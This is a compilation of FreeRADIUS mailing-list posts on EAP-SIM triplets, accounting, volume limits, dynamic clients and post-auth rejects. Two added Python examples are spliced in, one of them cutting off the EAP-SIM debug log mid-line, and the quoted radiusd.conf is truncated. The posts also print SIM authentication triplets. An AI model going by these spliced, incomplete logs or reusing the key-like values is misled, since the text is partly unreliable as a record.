EAP-SIM authentication problem at 2nd stage
Dear guest,

I have a problem with EAP-SIM authentication. I'm using FreeRADIUS 2.2.0 and a BlackBerry 9220. Here is my simtriplets.dat file:

1510012660372465,AF6876E748BD46bf853A99DC2032F0A7,95762655,449177635B92bc00
1510012660372465,A1A9AC744E8D49819D27A79B067BCA69,257b31c6,64ff9467DEa1e400
1510012660372465,603906BFD8DC404197BAC35FF1274EB3,4F41eb06,F3ce89b4FCbc
1510080332618369,23A95DB79B644a4299463F0342069A11,7775d266,B10f3eba2Bc5ed2b
1510080332618369,FDCE8E4F2B0B4b3086BEF230076EAD58,D9e080d9,E2aad63f711e1324
1510080332618369,238100571AD1495fBCE2AD5505634E41,A40e1656,66a098a750d9cd13

Here is the content of the users file:

1510080332618369	Auth-Type := EAP, EAP-Type := SIM
	EAP-Sim-Rand1 := 0x23A95DB79B644a4299463F0342069A11,
	EAP-Sim-SRES1 := 0x7775d266,
	EAP-Sim-KC1 := 0xB10f3eba2Bc5ed2b,
	EAP-Sim-Rand2 := 0xFDCE8E4F2B0B4b3086BEF230076EAD58,
	EAP-Sim-SRES2 := 0xD9e080d9,
	EAP-Sim-KC2 := 0xE2aad63f711e1324,
	EAP-Sim-Rand3 := 0x238100571AD1495fBCE2AD5505634E41,
	EAP-Sim-SRES3 := 0xA40e1656,
	EAP-Sim-KC3 := 0x66a098a750d9cd13,

1510012660372465	Auth-Type := EAP, EAP-Type := sim
	EAP-Sim-Rand1 := 0xAF6876E748BD46bf853A99DC2032F0A7,
	EAP-Sim-SRES1 := 0x95762655,
	EAP-Sim-KC1 := 0x449177635B92bc00,
	EAP-Sim-Rand2 := 0xA1A9AC744E8D49819D27A79B067BCA69,
	EAP-Sim-SRES2 := 0x257b31c6,
	EAP-Sim-KC2 := 0x64ff9467DEa1e400,
	EAP-Sim-Rand3 := 0x603906BFD8DC404197BAC35FF1274EB3,
	EAP-Sim-SRES3 := 0x4F41eb06,
	EAP-Sim-KC3 := 0xF3ce89b4FCbc,

1510080332618369@wlan.mnc080.mcc510.3gppnetwork.org	Auth-Type := EAP, EAP-Type := SIM
	EAP-Sim-Rand1 := 0x23A95DB79B644a4299463F0342069A11,
	EAP-Sim-SRES1 := 0x7775d266,
	EAP-Sim-KC1 := 0xB10f3eba2Bc5ed2b,
	EAP-Sim-Rand2 := 0xFDCE8E4F2B0B4b3086BEF230076EAD58,
	EAP-Sim-SRES2 := 0xD9e080d9,
	EAP-Sim-KC2 := 0xE2aad63f711e1324,
	EAP-Sim-Rand3 := 0x238100571AD1495fBCE2AD5505634E41,
	EAP-Sim-SRES3 := 0xA40e1656,
	EAP-Sim-KC3 := 0x66a098a750d9cd13

I have already included sim_files in modules and sim { } in eap.conf.
Analysing the debug output: the first authorization succeeds (sim_files returns ok), the first authentication succeeds, and the second authorization succeeds as well, but the second authentication fails. I have already read the past list archive, but found no clue. Here is the radiusd debug output:

Ready to process requests.
rad_recv: Access-Request packet from host 192.168.111.72 port 34647, id=129, length=250
	User-Name = 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org
	NAS-IP-Address = 192.168.88.52
	Called-Station-Id = FA-1A-67-9F-E4-68:NOLSPOT-Secure
	NAS-Port-Type = Wireless-802.11
	NAS-Port = 1
	Calling-Station-Id = 70-AA-B2-EF-8E-9D
	Connect-Info = CONNECT 54Mbps 802.11g
	Framed-MTU = 1400
	EAP-Message = 0x0210003801313531303038303236313833363940776c616e2e6d6e633038302e6d63633531302e336770706e6574776f726b2e6f7267
	Message-Authenticator = 0xf0b7f7c3d39dd64797e1ffa08c3c078e
# Executing section authorize from file /usr/local/etc/raddb/sites-enabled/default
+- entering group authorize {...}
++[preprocess] returns ok
++[chap] returns noop
++[mschap] returns noop
++[digest] returns noop
[suffix] Looking up realm wlan.mnc080.mcc510.3gppnetwork.org for User-Name = 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org
[suffix] Found realm wlan.mnc080.mcc510.3gppnetwork.org
[suffix] Adding Stripped-User-Name = 1510080332618369
[suffix] Adding Realm = wlan.mnc080.mcc510.3gppnetwork.org
[suffix] Authentication realm is LOCAL.
++[suffix] returns ok
[files] users: Matched entry 1510080332618369 at line 206
++[files] returns ok
rlm_sim_files: authorized user/imsi 1510080332618369
rlm_sim_files: Adding EAP-Type: eap-sim
++[sim_files] returns ok
[eap] EAP packet type response id 16 length 56
[eap] No EAP Start, assuming it's an on-going EAP conversation
++[eap] returns updated
[sql]	expand: %{User-Name} -> 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org
[sql] sql_set_user escaped user --> '1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org'
rlm_sql (sql): Reserving sql socket id: 4
[sql]	expand: SELECT id, username, attribute, value, op FROM radcheck WHERE username = '%{SQL-User-Name}' ORDER BY id -> SELECT id, username, attribute, value, op FROM radcheck WHERE username = '1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org' ORDER BY id
[sql]	expand: SELECT groupname FROM radusergroup WHERE username = '%{SQL-User-Name}' ORDER BY priority -> SELECT groupname FROM radusergroup WHERE username = '1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org' ORDER BY priority
rlm_sql (sql): Released sql socket id: 4
[sql] User 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org not found
++[sql]
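A sanity check for the simtriplets.dat format used by rlm_sim_files, added here as an example rather than taken from the post or from FreeRADIUS: each line is IMSI,RAND,SRES,Kc in hex, and GSM A3/A8 fixes RAND at 16 bytes, SRES at 4 and Kc at 8, with three triplets per identity. Run on the triplets quoted above (copied in as constructed sample data), it reports that the third Kc of identity 1510012660372465 is 12 hex digits instead of 16; the helper that renders the matching users entry is likewise an assumption about the layout, not a FreeRADIUS tool.

```python
"""Validate an rlm_sim_files simtriplets.dat and render the users-file form.

Added example, not from the original post or the FreeRADIUS project.
"""
import re
from collections import defaultdict

# Expected field widths in hex digits (GSM A3/A8 output sizes).
FIELD_HEX_LEN = {"RAND": 32, "SRES": 8, "KC": 16}
TRIPLETS_PER_IMSI = 3          # rlm_sim_files supplies three challenges
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

# Constructed copy of the simtriplets.dat quoted in the post above.
SAMPLE_TRIPLETS = """\
1510012660372465,AF6876E748BD46bf853A99DC2032F0A7,95762655,449177635B92bc00
1510012660372465,A1A9AC744E8D49819D27A79B067BCA69,257b31c6,64ff9467DEa1e400
1510012660372465,603906BFD8DC404197BAC35FF1274EB3,4F41eb06,F3ce89b4FCbc
1510080332618369,23A95DB79B644a4299463F0342069A11,7775d266,B10f3eba2Bc5ed2b
1510080332618369,FDCE8E4F2B0B4b3086BEF230076EAD58,D9e080d9,E2aad63f711e1324
1510080332618369,238100571AD1495fBCE2AD5505634E41,A40e1656,66a098a750d9cd13
"""


def parse_triplets(text):
    """Return ({identity: [(rand, sres, kc), ...]}, [problem, ...]).

    Problems are 'line N: reason' strings suitable for logging as-is;
    a well-formed file yields an empty list. Hex is normalised to upper case.
    """
    by_imsi = defaultdict(list)
    problems = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(",")
        if len(fields) != 4:
            problems.append(f"line {lineno}: expected 4 fields, got {len(fields)}")
            continue
        imsi, rand, sres, kc = (f.strip() for f in fields)
        # The identity column is the EAP-SIM permanent identity: digits only.
        if not imsi.isdigit():
            problems.append(f"line {lineno}: identity {imsi!r} is not all digits")
        for name, value in (("RAND", rand), ("SRES", sres), ("KC", kc)):
            want = FIELD_HEX_LEN[name]
            if not HEX_RE.match(value):
                problems.append(f"line {lineno}: {name} is not hex")
            elif len(value) != want:
                problems.append(
                    f"line {lineno}: {name} has {len(value)} hex digits, expected {want}")
        by_imsi[imsi].append((rand.upper(), sres.upper(), kc.upper()))
    for imsi, triplets in by_imsi.items():
        if len(triplets) != TRIPLETS_PER_IMSI:
            problems.append(
                f"identity {imsi}: {len(triplets)} triplets, expected {TRIPLETS_PER_IMSI}")
        rands = [t[0] for t in triplets]
        if len(set(rands)) != len(rands):
            # A repeated RAND means a repeated challenge, which defeats the point.
            problems.append(f"identity {imsi}: duplicate RAND")
    return dict(by_imsi), problems


def users_entry(imsi, triplets):
    """Render the equivalent 'users' file entry for one identity.

    Reply items are comma-separated; the last one carries no trailing comma.
    """
    lines = [f"{imsi}\tAuth-Type := EAP, EAP-Type := SIM"]
    items = []
    for i, (rand, sres, kc) in enumerate(triplets, start=1):
        items += [f"EAP-Sim-Rand{i} := 0x{rand}",
                  f"EAP-Sim-SRES{i} := 0x{sres}",
                  f"EAP-Sim-KC{i} := 0x{kc}"]
    lines += ["\t" + item + ("," if n < len(items) else "")
              for n, item in enumerate(items, start=1)]
    return "\n".join(lines)


if __name__ == "__main__":
    triplets, problems = parse_triplets(SAMPLE_TRIPLETS)
    for p in problems:
        print("PROBLEM:", p)
    for imsi in triplets:
        print(users_entry(imsi, triplets[imsi]))
        print()
```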
Re: Load Balancing
On 2013/02/12 04:45 PM, Alan DeKok wrote:
>> I tried to use Rad Client to send requests in Parallel, but I wasn't successful. Could you please help me out to send parallel requests to proxy server???

Am I missing something, or can you not simply run more than one instance of radclient on more than one console?

-- 
Johan Meiring
Cape PC Services CC
Tel: (021) 883-8271
Fax: (021) 886-7782
Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html
-
List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius several segfaults at heavy load and startup ?
On 2012/11/28 11:50 AM, Phil Mayers wrote:
>> root@itop0-db0:/scripts# LD_PRELOAD=/usr/lib/libperl.so.5.10
> Why are you fiddling with LD_PRELOAD?

On my Debian boxes FR cannot run without preload. There is something on the mailing list about it a while back.

-- 
Johan Meiring
Re: help - simultaneous accounting
On 2012/10/09 02:21 AM, 劉君羿 wrote:
> I am using *Chillispot* on my NAS. But it doesn't seem to support CoA. Can you suggest other AP controllers? By the way, I thought concurrent accounting was a feature that should be supported. I wonder why it's not supported by the major AAA protocols.

AFAIK chillispot (coova chilli) DOES support CoA. Look for 'coaport' in the config file.

With chillispot you can also disconnect the user in the accounting-reply packet, i.e. instead of sending a CoA, you can reply to the accounting update packets in a way that will disconnect the user, e.g. set the remaining time left to 1 second. Look at 'acctupdate' in the chillispot config.

Cheers,
-- 
Johan Meiring
Re: Very huge Acct-Session-Time
On 2012/05/04 03:13 AM, Claude Brown wrote:
> Probably not - but what have you got to lose by checking?

My 2c says that Alan DeKok is right. NAS is buggy.

What happens on the NAS is probably the following (this is a wild guess):
1) NAS boots, time is set to 1970.
2) User logs in, and NAS stores start time internally.
3) NTP on the NAS eventually figures out what the time is.
4) Next time the NAS calculates the session time, it is 43 years.

I must say I am unsure how I would do it differently if I was the NAS software developer.

-- 
Johan Meiring
Re: Volume Limit per user monthly
On 2012/05/04 09:06 AM, Fajar A. Nugraha wrote:
> First thing to ask your NAS vendor is whether they support the volume equivalent of session-timeout. For example, chillispot has ChilliSpot-Max-Total-Octets. If it doesn't, then there's no way to enforce the limit using any radius server. Period.

Unless you locally keep track of the total usage in all sessions for the month. When you receive an accounting update, you do the math. If the user is over, you send a POD. This is how our local telco works with ADSL.

Unfortunately you only get accounting updates every hour, so you might let a user run for about an hour before you disconnect him, but you don't really have another option.

Cheers,
-- 
Johan Meiring
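The bookkeeping described in the reply above (sum every session of the month on each accounting update, disconnect once the user is over), written out as an added example that is not from the thread or from any RADIUS server. It assumes accounting packets arrive as dicts keyed by attribute name, the 5 GiB cap and the records are constructed, and it folds in Acct-Input/Output-Gigawords, because the 32-bit octet counters wrap at 4 GiB and a cap above that cannot be enforced from the low words alone.

```python
"""Monthly volume cap from RADIUS accounting updates.

Added example, not from the original thread. Counters in Interim-Update and
Stop packets are cumulative per session, so per-session values are replaced,
not summed, and the month total is the sum over sessions.
"""
from collections import defaultdict

GiB = 1024 ** 3
MONTHLY_LIMIT_BYTES = 5 * GiB   # hypothetical cap per user per calendar month
GIGAWORD = 1 << 32              # Acct-*-Gigawords counts 2^32-byte wraps


def session_octets(record):
    """Bytes in + out for one session as reported by a single accounting packet."""
    return (record.get("Acct-Input-Gigawords", 0) * GIGAWORD
            + record.get("Acct-Input-Octets", 0)
            + record.get("Acct-Output-Gigawords", 0) * GIGAWORD
            + record.get("Acct-Output-Octets", 0))


class MonthlyVolumeTracker:
    """Per-user, per-session usage for each calendar month (YYYY-MM)."""

    def __init__(self, limit_bytes=MONTHLY_LIMIT_BYTES):
        self.limit = limit_bytes
        # usage[month][user][Acct-Session-Id] = highest cumulative count seen
        self.usage = defaultdict(lambda: defaultdict(dict))

    def total(self, user, month):
        """Bytes used by `user` across all sessions seen in `month`."""
        return sum(self.usage[month][user].values())

    def on_accounting(self, record):
        """Feed one accounting packet; return True if the user is over the cap.

        Only Interim-Update and Stop carry counters; Start is ignored. max()
        keeps a late-arriving older update from lowering the session count.
        """
        if record["Acct-Status-Type"] not in ("Interim-Update", "Stop"):
            return False
        month = record["Event-Timestamp"][:7]
        user = record["User-Name"]
        sid = record["Acct-Session-Id"]
        sessions = self.usage[month][user]
        sessions[sid] = max(sessions.get(sid, 0), session_octets(record))
        return self.total(user, month) > self.limit


# Constructed sample stream: alice has two sessions in May 2012, the second of
# which has wrapped past 4 GiB (Gigawords = 1); bob has one small session.
SAMPLE_RECORDS = [
    {"User-Name": "alice", "Acct-Session-Id": "a1", "Acct-Status-Type": "Interim-Update",
     "Event-Timestamp": "2012-05-02T10:00:00",
     "Acct-Input-Octets": GiB, "Acct-Output-Octets": GiB},
    {"User-Name": "alice", "Acct-Session-Id": "a1", "Acct-Status-Type": "Stop",
     "Event-Timestamp": "2012-05-02T11:00:00",
     "Acct-Input-Octets": 2 * GiB, "Acct-Output-Octets": GiB},
    {"User-Name": "alice", "Acct-Session-Id": "a2", "Acct-Status-Type": "Start",
     "Event-Timestamp": "2012-05-03T09:00:00"},
    {"User-Name": "alice", "Acct-Session-Id": "a2", "Acct-Status-Type": "Interim-Update",
     "Event-Timestamp": "2012-05-03T10:00:00", "Acct-Input-Gigawords": 1,
     "Acct-Input-Octets": GiB // 2, "Acct-Output-Octets": GiB // 2},
    {"User-Name": "bob", "Acct-Session-Id": "b1", "Acct-Status-Type": "Interim-Update",
     "Event-Timestamp": "2012-05-04T09:06:00",
     "Acct-Input-Octets": GiB, "Acct-Output-Octets": 0},
]


def run_sample(records=SAMPLE_RECORDS, limit=MONTHLY_LIMIT_BYTES):
    """Return ([(user, disconnect?), ...], tracker) after feeding every record."""
    tracker = MonthlyVolumeTracker(limit)
    decisions = [(r["User-Name"], tracker.on_accounting(r)) for r in records]
    return decisions, tracker


if __name__ == "__main__":
    decisions, tracker = run_sample()
    for user, disconnect in decisions:
        print(user, "-> send PoD" if disconnect else "-> ok")
```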
Re: sqlcounter_expire_on_login module
On 2012/05/03 09:37 AM, tonimanel wrote:
> Hi everybody, I have been looking for how to solve this: A user logs in to freeradius, and after the first login, exactly one day later the access should expire. Example: User: 'aaa' - 1 day (24 hours). First login: 2012-04-02 12:00:00. Expires on: 2012-04-03 12:00:00. I have enabled the sqlcounter_expire_on_login module; when the user logs in the first time there is no usage (radacct is empty for this user), but sqlcounter_expire_on_login's query returns an empty set, not a valid value (for example 0), so when freeradius checks the return, it says this:

Modify your query...

select ifnull((The rest of your query),0)

It will then return 0 when no records are found.

-- 
Johan Meiring
Setting up FreeRADIUS accounting with IP address logging
Hi!

I'm setting up wifi internet in my student dorm (90 people) and thought WPA2 Enterprise with FreeRADIUS (version 2.1.8 running on Ubuntu) would be a good solution, together with the incredibly stable Linksys WRT54GL and dd-wrt. There are a few problems I cannot figure out though:

1. How to set up plain-text accounting. I saw in the configuration that the log directory is set to /var/log/freeradius/radacct so I created the directory and made it writable (777 to be sure) but alas, there are no logs.

2. How to get FreeRADIUS to work with a DHCP server. I'm not asking about the experimental built-in DHCP server, as it seems very limited, but is it possible to somehow log the IP addresses that each user is assigned? We need to know who was using a certain IP address at a certain time.

3. How to connect using Windows. It's dead simple to connect to the network with Linux, Mac and smartphones, but for Windows it seems impossible to find the right combination of settings. I haven't googled this issue so much, so maybe there's a simple answer. Also, it's a later problem.

Thankful for a response,
Johan

P.S. I have attached the radiusd.conf file at the end. I haven't changed much though.

Johan Swetzén
jo...@swetzen.com

radiusd.conf

# -*- text -*-
##
## radiusd.conf -- FreeRADIUS server configuration file.
##
## http://www.freeradius.org/
## $Id$
##

#
# Read man radiusd before editing this file. See the section
# titled DEBUGGING. It outlines a method where you can quickly
# obtain the configuration you want, without running into
# trouble.
#
# Run the server in debugging mode, and READ the output.
#
# $ radiusd -X
#
# We cannot emphasize this point strongly enough. The vast
# majority of problems can be solved by carefully reading the
# debugging output, which includes warnings about common issues,
# and suggestions for how they may be fixed.
#
# There may be a lot of output, but look carefully for words like:
# warning, error, reject, or failure. The messages there
# will usually be enough to guide you to a solution.
#
# If you are going to ask a question on the mailing list, then
# explain what you are trying to do, and include the output from
# debugging mode (radiusd -X). Failure to do so means that all
# of the responses to your question will be people telling you
# to post the output of radiusd -X.

##
# The location of other config files and logfiles are declared
# in this file.
#
# Also general configuration for modules can be done in this
# file, it is exported through the API to modules that ask for
# it.
#
# See man radiusd.conf for documentation on the format of this
# file. Note that the individual configuration items are NOT
# documented in that man page. They are only documented here,
# in the comments.
#
# As of 2.0.0, FreeRADIUS supports a simple processing language
# in the authorize, authenticate, accounting, etc. sections.
# See man unlang for details.
#

prefix = /usr
exec_prefix = /usr
sysconfdir = /etc
localstatedir = /var
sbindir = ${exec_prefix}/sbin
logdir = /var/log/freeradius
raddbdir = /etc/freeradius
radacctdir = ${logdir}/radacct

#
# name of the running server. See also the -n command-line option.
name = freeradius

# Location of config and logfiles.
confdir = ${raddbdir}
run_dir = ${localstatedir}/run/${name}

# Should likely be ${localstatedir}/lib/radiusd
db_dir = ${raddbdir}

#
# libdir: Where to find the rlm_* modules.
#
# This should be automatically set at configuration time.
#
# If the server builds and installs, but fails at execution time
# with an 'undefined symbol' error, then you can use the libdir
# directive to work around the problem.
#
# The cause is usually that a library has been installed on your
# system in a place where the dynamic linker CANNOT find it. When
# executing as root (or another user), your personal environment MAY
# be set up to allow the dynamic linker to find the library. When
# executing as a daemon, FreeRADIUS MAY NOT have the same
# personalized configuration.
#
# To work around the problem, find out which library contains that symbol,
# and add the directory containing that library to the end of 'libdir',
# with a colon separating the directory names. NO spaces are allowed.
#
# e.g. libdir = /usr/local/lib:/opt/package/lib
#
# You can also try setting the LD_LIBRARY_PATH environment variable
# in a script which starts the server.
#
# If that does not work, then you can re-configure and re-build the
# server to NOT use shared libraries, via:
#
# ./configure
Re: FreeRadius questions
On 2012/02/28 07:06 PM, James DeLuca wrote:
> Module: Checking post-auth {...} for more modules to load
> }
> radiusd: Opening IP addresses and Ports
> listen {
> 	type = auth
> 	ipaddr = 10.0.8.9

You've configured your server to NOT listen on localhost. Sending to localhost will therefore not work.

-- 
Johan Meiring
Re: Configuring freeradius for MACsec
On 2012/02/24 09:38 AM, Alan DeKok wrote:
> TTLS doesn't generate it. My guess is that Cisco has invented something themselves which defines EAP-Key-Name. Find out what that is, and we can implement it in FreeRADIUS.

This?
http://tools.ietf.org/html/draft-aboba-radext-wlan-15

-- 
Johan Meiring
Re: FreeRadius to authenticate DHCP Requests with Option82
On 2012/02/22 01:10 PM, Alan DeKok wrote:
> Yes. If you use FreeRADIUS for both RADIUS and DHCP, you can track user status in a database. When you receive a RADIUS packet, update the database. When you receive a DHCP packet, query the database. Traditional DHCP servers (i.e. ISC) make this hard. They don't talk to databases. They're firmly stuck in 1980's technology.

Another option which we use very successfully is a Mikrotik DHCP server. It can talk to FreeRADIUS.
http://wiki.mikrotik.com/wiki/Manual:IP/DHCP_Server
It works well.

-- 
Johan Meiring
Re: rlm_perl and returning 1 attribute with same name
On 2012/02/17 02:38 PM, Mike wrote:
> Hello, I am using rlm_perl and I have an application where I would like to return possibly more than 1 Filter-Id in my response. In perl, the relevant code would be this:
> $RAD_REPLY{'Filter-Id'} = some_filter
> Unfortunately, this also will only create 1 avpair by the name 'Filter-Id'. How would I go about returning more than 1 or am I stuck because of perl?

I have an array with my Framed-Routes. I then do the following:

$RAD_REPLY{'Framed-Route'} = \@framedroutearray;

-- 
Johan Meiring
Re: Last login time in LDAP?
On 2012/02/08 06:24 PM, Phil Mayers wrote:
> On 08/02/12 15:56, John Doppke wrote:
>> Does someone know if freeradius can update an LDAP user attribute as part of post processing?
> As far as I'm aware, that's not currently possible via rlm_ldap. You could use a wrapper script around ldapmodify, called via the exec module.

A better option might be rlm_perl.

-- 
Johan Meiring
Re: Segfault in 2.1.10 backports version advice
On 2012/01/23 03:20 PM, Alan DeKok wrote:
>> I could upgrade the OS (Lenny to Squeeze). Debugging from this backports version seems an impossible road? Or I could install the -dbg version and perhaps run the server in a screen session? However I have experienced it won't crash if run in debug mode (-X). I reckon in -X it is run in single threaded mode?
> Yes.

Hi,

I can confirm the same problem. Version is freeradius-git downloaded about 4 days before 2.1.12 was released. Running with -X it runs forever (about two months now). Without, it crashes about once a week. Have not had the time to collect debug info.

-- 
Johan Meiring
Re: Radius Client vs. Radius Client-NG
On 2011/12/08 09:05 PM, Alexandre Chapellon wrote:
> read this: http://freeradius.org/freeradius-client/
> from the link below:
>> In late 2006 it was decided that the FreeRADIUS Project should adopt the latest code from radiusclient-ng cvs as the basis of a new FreeRADIUS client package.
> I personally use radiusclient-ng

I also use radiusclient-ng. Comes as a standard Debian package. Never had an issue.

-- 
Johan Meiring
Re: Change of network adapters in radius server
On 2011/12/02 09:52 AM, Alan DeKok wrote:
> I've done tests with 50K requests/s for days straight. My smartphone could do 200 requests/s.

I must say, FreeRADIUS running on a smartphone is quite cool!

-- 
Johan Meiring
Re: AK Timeout
Hi,

Reading between the lines I suspect the NAS notes mean:

re-authentication timer (aka life time)
i.e. re-authentication time (also known as life time)

I suspect the NAS will re-authenticate every hour. FreeRADIUS must not consider the session closed if the re-authentication does not arrive (for at least an hour). As FreeRADIUS will not consider the session closed (until it receives an accounting stop), all should be fine.

Cheers,
Johan

On 2011/12/02 01:41 AM, David Peterson wrote:
> Sigh, I wish I knew. I was hoping it would make sense to someone on this list. I will bug the NAS manufacturer for clarification.
>
> David
>
> -----Original Message-----
> From: freeradius-users-bounces+davidp=wirelessconnections@lists.freeradius.org [mailto:freeradius-users-bounces+davidp=wirelessconnections@lists.freeradius.org] On Behalf Of Alan DeKok
> Sent: Thursday, December 01, 2011 3:52 PM
> To: FreeRadius users mailing list
> Subject: Re: AK Timeout
>
> David Peterson wrote:
>> In one of my NAS release notes it mentions: "In the external AAA, the re-authentication timer (AK Life time) should be set to a value higher than 1hour." Where would I set this?
>
> What's an AK life time?
>
> Alan DeKok.

-- 
Johan Meiring
Re: radiusd goes wrong
On 2011/11/05 01:41 AM, Ivan Matala wrote:
> freeradius runs if i use this radiusd -x -f pls help

http://www.lmgtfy.com/?q=fix+unix+permissions

-- 
Johan Meiring
Re: IPv6 ready?
On 2011/10/31 05:58 PM, Sergio NNX wrote:
> Thanks Phil. Can you try 'mkdir 0:0:0:0:0:0:0:0' on a Windows box and let me know if it works?

C:\junk>mkdir 0:0:0:0:0:0:0:0
The system cannot find the drive specified.

C:\junk>mkdir '0:0:0:0:0:0:0:0'
The filename, directory name, or volume label syntax is incorrect.

C:\junk>mkdir 0:0:0:0:0:0:0:0
The system cannot find the drive specified.

C:\junk>mkdir 0\:0\:0\:0\:0\:0\:0\:0
The filename, directory name, or volume label syntax is incorrect.

Why not simply remove the IP address from the log path? Do they HAVE to be in directories with the IP address as part of the name?

Cheers,
-- 
Johan Meiring
Re: Authorising Clients by Calling Station ID Not IP
On 2011/10/24 09:06 PM, Jennyanydots Napoleon Shoehorn wrote:
> OH! I've looked too many lines of code over the last week. I have no idea how to patch but will investigate. Was thinking we might have to use nas-id instead. The ultimate intention was to use the mac address of the nas and a nas specific shared secret. In your opinion, are there better ways to deal with dynamic clients? Thanks again

Hi,

I look up my clients using dynamic clients and NAS-Identifier.

You need a module that is not included by default called rlm_raw. You can download a patch here:
http://www.sendspace.com/file/f91rqi

The last file won't apply cleanly to 2.1.12; just manually add rlm_raw to the src/modules/stable file. (Look at the patch.)

In your FreeRADIUS config, you need to instantiate rlm_raw.

/etc/freeradius/radiusd.conf
instantiate {
	raw
}

You need a module:

/etc/freeradius/modules/raw
raw {
}

My dynamic clients config:

/etc/freeradius/sites-available/my-dynamic-clients
client dymamic {
	ipaddr = 0.0.0.0
	netmask = 0
	dynamic_clients = dynamic_nas
	lifetime = 86400
}

server dynamic_nas {
	authorize {
		if (%{sql: select count(*) from Nas where Identifier='%{raw:NAS-Identifier}'} == 1) {
			update control {
				FreeRADIUS-Client-IP-Address = %{Packet-Src-IP-Address}
				FreeRADIUS-Client-Require-MA = no
				FreeRADIUS-Client-Secret = %{sql: select RadiusSecret from Nas where Identifier='%{raw:NAS-Identifier}' and NasTypeID=1}
				FreeRADIUS-Client-Shortname = %{Packet-Src-IP-Address}
				FreeRADIUS-Client-NAS-Type = other
				FreeRADIUS-Client-Virtual-Server = dynamic_server
			}
			ok
		}
	}
}

Notes:
- dynamic_server is the specific virtual server that handles the dynamic clients.
- the rlm_raw packet MIGHT contain Calling-Station-Id (or do you mean Called-Station-Id??) as well. You will have to look.

Hope this helps.

Cheers,
-- 
Johan Meiring
Re: Rewriting wimax calling-station-id with perl
On 2011/10/05 08:15 PM, James T Mugauri wrote:
> Hi, As you are undoubtedly aware, the ubuntu/debian package of freeradius comes without the wimax module (despite having the wimax module) installed. My own attempts to compile/install/build deb package for ubuntu always die with the infamous undefined reference to `lt_preloaded_symbols' that apparently has even Alan opting to forsake libtool.

Which version of Debian do you need packages for?

-- 
Johan Meiring
Post-auth and Rejected logins
Hi,

Hope the following makes sense.

I have a perl module that runs in post-auth. It checks various things that confirm whether the user may have access and, if not, would turn an Accept into a Reject. I want this perl module to run whether the authentication previously failed or not.

I'm using the documented method of the following:

post-auth {
	my_perl
	Post-Auth-Type REJECT {
		my_perl
	}
}

The problem comes in here.

If authentication failed, the module runs once only (in the Post-Auth-Type REJECT stanza).

If authentication was OK, and my perl module also OK's the request, it runs once only (in the non Post-Auth-Type REJECT stanza).

But if the authentication was OK, and my perl module then decides to reject the authentication (by returning RLM_MODULE_REJECT), the perl module runs twice.

I've tried swapping around the post-auth section as follows:

post-auth {
	Post-Auth-Type REJECT {
		my_perl
	}
	my_perl
}

The REJECT stanza is still executed if the non-REJECT stanza turns the accept into a reject.

The only solution I can come up with is to set a Tmp-String, and using unlang try to force the perl to not run again.

Does anyone know of a more elegant way?

Thanks!

-- 
Johan Meiring
Re: Post-auth and Rejected logins
On 2011/09/26 11:38 PM, Alan DeKok wrote:
> Johan Meiring wrote:
>> If the authentication was OK, and my perl module then decides to reject the authentication (by returning RLM_MODULE_REJECT),
> Don't do that. The post-auth section is for running modules AFTER the user has been accepted or rejected. It doesn't make much sense to accept the user, and then reject them. Instead, reject the user earlier in the packet processing.

Hi Alan,

What you say makes sense.

My perl code used to run in the Authorisation section. The reason I moved it down (to post-auth) is because some of my queries are very database intensive (complex system).

i.e. What I had was:
1) Authorisation (using rlm_perl): Check various stuff. If OK so far, create Cleartext-Password, else reject
2) Authentication, PAP/CHAP/whatever

What I tried to avoid was that the "check various stuff" runs if the user supplied the wrong password. I therefore modified the setup as follows:
1) Authorisation - Create Cleartext-Password (using rlm_mysql)
2) Authentication - PAP/CHAP/whatever
3) Post-Auth - Check the various stuff and reject (using rlm_perl)

This saves a lot of unnecessary (database) CPU cycles.

Using a Tmp-String works. My post-auth now looks as follows:

post-auth {
	my_perl
	Post-Auth-Type REJECT {
		if (%{reply:Tmp-String-0} != DONTRUNAGAIN) {
			my_perl
		}
	}
}

The perl post-auth subroutine simply contains the following:

$RAD_REPLY{'Tmp-String-0'} = 'DONTRUNAGAIN';

This works as expected. I was just hoping for a more elegant solution.

Thanks again!!

-- 
Johan Meiring
WARNING about auth-type = Local
Hi,

I use a completely custom setup. Not using the default server at all. All is working fine, except for a warning.

In the authorise section, I have rlm_sql that selects the cleartext password from a database. The query looks like this:

authorize_check_query = SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' \
	from Account WHERE Login = '%{SQL-User-Name}'
}

This is the rlm_sql query defined. My authorise and authenticate sections look like this:

authorize {
	authorisation_log
	chap
	mschap
	sql
}

authenticate {
	Auth-Type PAP {
		pap
	}
	Auth-Type CHAP {
		chap
	}
	Auth-Type MS-CHAP {
		mschap
	}
}

When a PAP request comes in, just after the sql selects the password and somewhere before authenticate, I get a warning. (Unsure if the warning will appear for CHAP/MSCHAP.)

---
[sql]	expand: SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' from Account WHERE Login = '%{SQL-User-Name}' -> SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' from Account WHERE Login = 't...@domain.co.za'
[sql] User found in radcheck table
rlm_sql (sql): Released sql socket id: 1
+++[sql] returns ok
++- else else returns ok
WARNING: Please update your configuration, and remove 'Auth-Type = Local'
WARNING: Use the PAP or CHAP modules instead.
User-Password in the request is correct.
# Executing section post-auth from file /etc/freeradius/sites-enabled/custom
+- entering group post-auth {...}
---

Do I need to concern myself with the warning? All is working fine, I was just inquisitive as to why this happens.

Thanks!

-- 
Johan Meiring
Re: WARNING about auth-type = Local
On 2011/09/21 06:19 PM, Alan DeKok wrote:
> Johan Meiring wrote:
>> My authorise and authenticate section looks like this.
>> authorize {
>> 	authorisation_log
>> 	chap
>> 	mschap
>> 	sql
> 	pap
>> }
> You need the pap module last in the authorize section. It will set Auth-Type for you.
>
> In 3.0, the Auth-Type = Local warnings will likely go away, because the server *won't* set it. Instead, you'll just get no Auth-Type
